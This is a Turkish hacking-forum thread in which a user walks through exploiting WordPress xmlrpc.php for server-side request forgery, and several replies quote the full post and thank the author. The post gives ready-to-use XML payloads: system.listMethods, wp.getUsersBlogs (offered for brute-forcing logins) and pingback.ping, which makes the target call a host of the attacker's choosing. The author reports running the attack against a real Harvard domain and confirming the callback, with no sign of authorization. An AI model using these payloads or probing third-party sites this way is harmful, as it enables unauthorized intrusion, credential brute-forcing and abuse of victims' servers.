# WordPress Xmlrpc SSRF Zafiyeti Nedir ? #

P4$A

Anka Emektar
13 Tem 2021
1,489
9
2,824
23
";-alert(1)-//
66wh4i4.png

Selamlar okuyucu kafam esti yine dökülüyorum,
Wordpress Nedir? , Xmlrpc Nedir? Nasıl Çalışır? SSRF Zafiyeti Nedir? bilmiyorsan sağ üsteki arama butonundan ara öğren hazıra konmak yok.
Geçenler de bir blackhat turnuvası yapıldı bilenler bilir .

Not: Bilmeyenler için rusların düzenlemiş olduğu sızma testi alanında bir yarışmaydı (Detay soracak olan dm atsın, konuyu dağıtmayalım.) .
Genel mana da güzel bir yarışma oldu.
Yarışma zamanın da bulduğum bulgulardan biri de xmlrpc üzerinden ssrf zafiyetini tetiklemektir.
Hala bunun dışarıya dönük dos saldırıs vb. olacağını düşünen researcherlar var sunucudan istediğimiz sunucuya istek attırabiliyoruz.
Neyse goygoy kesiyim gelelim zafiyet nasıl bulunuyor ve poc ediliyor.

Not: Bounty'de bu zafiyet ile dehşet para vuruluyor, wordpress sistemlerde bakılması gerek bir zafiyettir, önerimdir.
İlk önce
xmlrpc.php dosyasına erişebileceğimiz bir sunucu bulalım.
enql8u0.jpg

Ben daha önceden göz attığım bir hedef belirledim,

harward'ın bir domaini görüldüğü üzere Wordpress'in 6.0.5 versiyonu kullanılıyor.
Şimdi bakalım
xmlrpc.php dosyasına erişebilecek miyiz.
885bna1.jpg

Evet burada bize xmlrpc server ın sadece
post isteklerini kabul edeceğini söylüyor,burp suite ile isteği repeater'a atıp methodu değiştiriyorum.
fv590jv.jpg

3njna39.jpg

Görüldüğü gibi
POST isteği gönderdiğimiz zaman artık 200 alıyoruz.
Herhangi bir xml verisi göndermediğimiz için parse hatası veriyor.
Şimdi bakalım xmlrpc nin hangi metotları açıkmış.
XML:
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>
l0lthiq.jpg

Görüldüğü üzere çokça method açık
wp.getUsersBlogs u bilerek gösterdim buradan bruteforce atılabiliyor.
XML:
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>Username</value></param>
<param><value>Password</value></param>
</params>
</methodCall>
Onu da sağ üstten arayarak öğrenebilirsin hazıra konmak yok.
Bugün işimiz ama
pingback metodu ile.
d79b5je.jpg

Eğer bu metot açık değil ise siteyi değiştirebilirsiniz.
Şimdi bunu nasıl sömürüyoruz ?
Aşağıdaki gibi bir xml kodu ile sömürebiliriz buyurun.
XML:
<methodCall>
    <methodName>pingback.ping</methodName>
    <params>
        <param><value><string>http://nereye_istek_attırmak_istiyorsak</string></value></param>
        <param><value><string>http://zafiyetli_hedef_site</string></value></param>
    </params>
</methodCall>
e8npc1r.jpg

Ben burpsuite'in içindeki
collaborator'u kullandım daha stabil olduğunu düşünüyorum, prosu olmayan webhook sitelerine başvurabilir.
53qyre5.jpg

Hemen DNS üzerinden bir gelen istek görüldüğü gibi geldi. Kendi sunucumuza bir istek attırarak bunu poc etmiş olduk.
Gelen ip adresinin de ip whois ile harvard'dan olduğunu doğruladım.
fg89xzj.jpg

Okuyup ta yorum yazmayan arkadaşlara selam olsun.
 

harasad

Katılımcı Üye
14 Eyl 2023
307
1
106
66wh4i4.png

Selamlar okuyucu kafam esti yine dökülüyorum,
Wordpress Nedir? , Xmlrpc Nedir? Nasıl Çalışır? SSRF Zafiyeti Nedir? bilmiyorsan sağ üsteki arama butonundan ara öğren hazıra konmak yok.
Geçenler de bir blackhat turnuvası yapıldı bilenler bilir .

Not: Bilmeyenler için rusların düzenlemiş olduğu sızma testi alanında bir yarışmaydı (Detay soracak olan dm atsın, konuyu dağıtmayalım.) .
Genel mana da güzel bir yarışma oldu.
Yarışma zamanın da bulduğum bulgulardan biri de xmlrpc üzerinden ssrf zafiyetini tetiklemektir.
Hala bunun dışarıya dönük dos saldırıs vb. olacağını düşünen researcherlar var sunucudan istediğimiz sunucuya istek attırabiliyoruz.
Neyse goygoy kesiyim gelelim zafiyet nasıl bulunuyor ve poc ediliyor.

Not: Bounty'de bu zafiyet ile dehşet para vuruluyor, wordpress sistemlerde bakılması gerek bir zafiyettir, önerimdir.
İlk önce
xmlrpc.php dosyasına erişebileceğimiz bir sunucu bulalım.
enql8u0.jpg

Ben daha önceden göz attığım bir hedef belirledim,

harward'ın bir domaini görüldüğü üzere Wordpress'in 6.0.5 versiyonu kullanılıyor.
Şimdi bakalım
xmlrpc.php dosyasına erişebilecek miyiz.
885bna1.jpg

Evet burada bize xmlrpc server ın sadece
post isteklerini kabul edeceğini söylüyor,burp suite ile isteği repeater'a atıp methodu değiştiriyorum.
fv590jv.jpg

3njna39.jpg

Görüldüğü gibi
POST isteği gönderdiğimiz zaman artık 200 alıyoruz.
Herhangi bir xml verisi göndermediğimiz için parse hatası veriyor.
Şimdi bakalım xmlrpc nin hangi metotları açıkmış.
XML:
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>
l0lthiq.jpg

Görüldüğü üzere çokça method açık
wp.getUsersBlogs u bilerek gösterdim buradan bruteforce atılabiliyor.
XML:
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>Username</value></param>
<param><value>Password</value></param>
</params>
</methodCall>
Onu da sağ üstten arayarak öğrenebilirsin hazıra konmak yok.
Bugün işimiz ama
pingback metodu ile.
d79b5je.jpg

Eğer bu metot açık değil ise siteyi değiştirebilirsiniz.
Şimdi bunu nasıl sömürüyoruz ?
Aşağıdaki gibi bir xml kodu ile sömürebiliriz buyurun.
XML:
<methodCall>
    <methodName>pingback.ping</methodName>
    <params>
        <param><value><string>http://nereye_istek_attırmak_istiyorsak</string></value></param>
        <param><value><string>http://zafiyetli_hedef_site</string></value></param>
    </params>
</methodCall>
e8npc1r.jpg

Ben burpsuite'in içindeki
collaborator'u kullandım daha stabil olduğunu düşünüyorum, prosu olmayan webhook sitelerine başvurabilir.
53qyre5.jpg

Hemen DNS üzerinden bir gelen istek görüldüğü gibi geldi. Kendi sunucumuza bir istek attırarak bunu poc etmiş olduk.
Gelen ip adresinin de ip whois ile harvard'dan olduğunu doğruladım.
fg89xzj.jpg

Okuyup ta yorum yazmayan arkadaşlara selam olsun.
Böyle paylaşıma yorum yazılmaz mı? Eline sağık 👏👏
 

invisible blood

Uzman üye
15 Eyl 2023
1,177
1
443
66wh4i4.png

Selamlar okuyucu kafam esti yine dökülüyorum,
Wordpress Nedir? , Xmlrpc Nedir? Nasıl Çalışır? SSRF Zafiyeti Nedir? bilmiyorsan sağ üsteki arama butonundan ara öğren hazıra konmak yok.
Geçenler de bir blackhat turnuvası yapıldı bilenler bilir .

Not: Bilmeyenler için rusların düzenlemiş olduğu sızma testi alanında bir yarışmaydı (Detay soracak olan dm atsın, konuyu dağıtmayalım.) .
Genel mana da güzel bir yarışma oldu.
Yarışma zamanın da bulduğum bulgulardan biri de xmlrpc üzerinden ssrf zafiyetini tetiklemektir.
Hala bunun dışarıya dönük dos saldırıs vb. olacağını düşünen researcherlar var sunucudan istediğimiz sunucuya istek attırabiliyoruz.
Neyse goygoy kesiyim gelelim zafiyet nasıl bulunuyor ve poc ediliyor.

Not: Bounty'de bu zafiyet ile dehşet para vuruluyor, wordpress sistemlerde bakılması gerek bir zafiyettir, önerimdir.
İlk önce
xmlrpc.php dosyasına erişebileceğimiz bir sunucu bulalım.
enql8u0.jpg

Ben daha önceden göz attığım bir hedef belirledim,

harward'ın bir domaini görüldüğü üzere Wordpress'in 6.0.5 versiyonu kullanılıyor.
Şimdi bakalım
xmlrpc.php dosyasına erişebilecek miyiz.
885bna1.jpg

Evet burada bize xmlrpc server ın sadece
post isteklerini kabul edeceğini söylüyor,burp suite ile isteği repeater'a atıp methodu değiştiriyorum.
fv590jv.jpg

3njna39.jpg

Görüldüğü gibi
POST isteği gönderdiğimiz zaman artık 200 alıyoruz.
Herhangi bir xml verisi göndermediğimiz için parse hatası veriyor.
Şimdi bakalım xmlrpc nin hangi metotları açıkmış.
XML:
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>
l0lthiq.jpg

Görüldüğü üzere çokça method açık
wp.getUsersBlogs u bilerek gösterdim buradan bruteforce atılabiliyor.
XML:
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>Username</value></param>
<param><value>Password</value></param>
</params>
</methodCall>
Onu da sağ üstten arayarak öğrenebilirsin hazıra konmak yok.
Bugün işimiz ama
pingback metodu ile.
d79b5je.jpg

Eğer bu metot açık değil ise siteyi değiştirebilirsiniz.
Şimdi bunu nasıl sömürüyoruz ?
Aşağıdaki gibi bir xml kodu ile sömürebiliriz buyurun.
XML:
<methodCall>
    <methodName>pingback.ping</methodName>
    <params>
        <param><value><string>http://nereye_istek_attırmak_istiyorsak</string></value></param>
        <param><value><string>http://zafiyetli_hedef_site</string></value></param>
    </params>
</methodCall>
e8npc1r.jpg

Ben burpsuite'in içindeki
collaborator'u kullandım daha stabil olduğunu düşünüyorum, prosu olmayan webhook sitelerine başvurabilir.
53qyre5.jpg

Hemen DNS üzerinden bir gelen istek görüldüğü gibi geldi. Kendi sunucumuza bir istek attırarak bunu poc etmiş olduk.
Gelen ip adresinin de ip whois ile harvard'dan olduğunu doğruladım.
fg89xzj.jpg

Okuyup ta yorum yazmayan arkadaşlara selam olsun.
Teşekkür ederiz hocam
 

Joe McLean

Yeni üye
19 Ocak 2019
24
1
3
66wh4i4.png

Selamlar okuyucu kafam esti yine dökülüyorum,
Wordpress Nedir? , Xmlrpc Nedir? Nasıl Çalışır? SSRF Zafiyeti Nedir? bilmiyorsan sağ üsteki arama butonundan ara öğren hazıra konmak yok.
Geçenler de bir blackhat turnuvası yapıldı bilenler bilir .

Not: Bilmeyenler için rusların düzenlemiş olduğu sızma testi alanında bir yarışmaydı (Detay soracak olan dm atsın, konuyu dağıtmayalım.) .
Genel mana da güzel bir yarışma oldu.
Yarışma zamanın da bulduğum bulgulardan biri de xmlrpc üzerinden ssrf zafiyetini tetiklemektir.
Hala bunun dışarıya dönük dos saldırıs vb. olacağını düşünen researcherlar var sunucudan istediğimiz sunucuya istek attırabiliyoruz.
Neyse goygoy kesiyim gelelim zafiyet nasıl bulunuyor ve poc ediliyor.

Not: Bounty'de bu zafiyet ile dehşet para vuruluyor, wordpress sistemlerde bakılması gerek bir zafiyettir, önerimdir.
İlk önce
xmlrpc.php dosyasına erişebileceğimiz bir sunucu bulalım.
enql8u0.jpg

Ben daha önceden göz attığım bir hedef belirledim,

harward'ın bir domaini görüldüğü üzere Wordpress'in 6.0.5 versiyonu kullanılıyor.
Şimdi bakalım
xmlrpc.php dosyasına erişebilecek miyiz.
885bna1.jpg

Evet burada bize xmlrpc server ın sadece
post isteklerini kabul edeceğini söylüyor,burp suite ile isteği repeater'a atıp methodu değiştiriyorum.
fv590jv.jpg

3njna39.jpg

Görüldüğü gibi
POST isteği gönderdiğimiz zaman artık 200 alıyoruz.
Herhangi bir xml verisi göndermediğimiz için parse hatası veriyor.
Şimdi bakalım xmlrpc nin hangi metotları açıkmış.
XML:
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>
l0lthiq.jpg

Görüldüğü üzere çokça method açık
wp.getUsersBlogs u bilerek gösterdim buradan bruteforce atılabiliyor.
XML:
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>Username</value></param>
<param><value>Password</value></param>
</params>
</methodCall>
Onu da sağ üstten arayarak öğrenebilirsin hazıra konmak yok.
Bugün işimiz ama
pingback metodu ile.
d79b5je.jpg

Eğer bu metot açık değil ise siteyi değiştirebilirsiniz.
Şimdi bunu nasıl sömürüyoruz ?
Aşağıdaki gibi bir xml kodu ile sömürebiliriz buyurun.
XML:
<methodCall>
    <methodName>pingback.ping</methodName>
    <params>
        <param><value><string>http://nereye_istek_attırmak_istiyorsak</string></value></param>
        <param><value><string>http://zafiyetli_hedef_site</string></value></param>
    </params>
</methodCall>
e8npc1r.jpg

Ben burpsuite'in içindeki
collaborator'u kullandım daha stabil olduğunu düşünüyorum, prosu olmayan webhook sitelerine başvurabilir.
53qyre5.jpg

Hemen DNS üzerinden bir gelen istek görüldüğü gibi geldi. Kendi sunucumuza bir istek attırarak bunu poc etmiş olduk.
Gelen ip adresinin de ip whois ile harvard'dan olduğunu doğruladım.
fg89xzj.jpg

Okuyup ta yorum yazmayan arkadaşlara selam olsun.
Çok güzel konu ve çok güzel anlatım. Teşekkürler!
 

P4$A

Anka Emektar
13 Tem 2021
1,489
9
2,824
23
";-alert(1)-//
Böyle paylaşıma yorum yazılmaz mı? Eline sağık 👏👏
Değerli yorumunuz için ben teşekkür ederim.
Teşekkür ederiz hocam
Rica ederim kardeşim.
Elinize Sağlık Hocam.
Rica ederim değerli dostum sende bu şekilde az bilinen konuları aç.
Teşekkürler :D
Elinize Sağlık Hocam.
Teşekkürler :)
Bu bu kamile ne desem olmuyor zaten.
Çok güzel konu ve çok güzel anlatım. Teşekkürler!
Çok güzel yorum :D . Teşekkürler
Elinize sağlık.
Teşekkürler :)
Teşekkür ederim, değerli admin abim.
 

louise0357

Anka Team Junior
21 Tem 2023
519
10
197
Medellín
66wh4i4.png

Selamlar okuyucu kafam esti yine dökülüyorum,
Wordpress Nedir? , Xmlrpc Nedir? Nasıl Çalışır? SSRF Zafiyeti Nedir? bilmiyorsan sağ üsteki arama butonundan ara öğren hazıra konmak yok.
Geçenler de bir blackhat turnuvası yapıldı bilenler bilir .

Not: Bilmeyenler için rusların düzenlemiş olduğu sızma testi alanında bir yarışmaydı (Detay soracak olan dm atsın, konuyu dağıtmayalım.) .
Genel mana da güzel bir yarışma oldu.
Yarışma zamanın da bulduğum bulgulardan biri de xmlrpc üzerinden ssrf zafiyetini tetiklemektir.
Hala bunun dışarıya dönük dos saldırıs vb. olacağını düşünen researcherlar var sunucudan istediğimiz sunucuya istek attırabiliyoruz.
Neyse goygoy kesiyim gelelim zafiyet nasıl bulunuyor ve poc ediliyor.

Not: Bounty'de bu zafiyet ile dehşet para vuruluyor, wordpress sistemlerde bakılması gerek bir zafiyettir, önerimdir.
İlk önce
xmlrpc.php dosyasına erişebileceğimiz bir sunucu bulalım.
enql8u0.jpg

Ben daha önceden göz attığım bir hedef belirledim,

harward'ın bir domaini görüldüğü üzere Wordpress'in 6.0.5 versiyonu kullanılıyor.
Şimdi bakalım
xmlrpc.php dosyasına erişebilecek miyiz.
885bna1.jpg

Evet burada bize xmlrpc server ın sadece
post isteklerini kabul edeceğini söylüyor,burp suite ile isteği repeater'a atıp methodu değiştiriyorum.
fv590jv.jpg

3njna39.jpg

Görüldüğü gibi
POST isteği gönderdiğimiz zaman artık 200 alıyoruz.
Herhangi bir xml verisi göndermediğimiz için parse hatası veriyor.
Şimdi bakalım xmlrpc nin hangi metotları açıkmış.
XML:
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>
l0lthiq.jpg

Görüldüğü üzere çokça method açık
wp.getUsersBlogs u bilerek gösterdim buradan bruteforce atılabiliyor.
XML:
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>Username</value></param>
<param><value>Password</value></param>
</params>
</methodCall>
Onu da sağ üstten arayarak öğrenebilirsin hazıra konmak yok.
Bugün işimiz ama
pingback metodu ile.
d79b5je.jpg

Eğer bu metot açık değil ise siteyi değiştirebilirsiniz.
Şimdi bunu nasıl sömürüyoruz ?
Aşağıdaki gibi bir xml kodu ile sömürebiliriz buyurun.
XML:
<methodCall>
    <methodName>pingback.ping</methodName>
    <params>
        <param><value><string>http://nereye_istek_attırmak_istiyorsak</string></value></param>
        <param><value><string>http://zafiyetli_hedef_site</string></value></param>
    </params>
</methodCall>
e8npc1r.jpg

Ben burpsuite'in içindeki
collaborator'u kullandım daha stabil olduğunu düşünüyorum, prosu olmayan webhook sitelerine başvurabilir.
53qyre5.jpg

Hemen DNS üzerinden bir gelen istek görüldüğü gibi geldi. Kendi sunucumuza bir istek attırarak bunu poc etmiş olduk.
Gelen ip adresinin de ip whois ile harvard'dan olduğunu doğruladım.
fg89xzj.jpg

Okuyup ta yorum yazmayan arkadaşlara selam olsun.
Elinize sağlık hocam
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.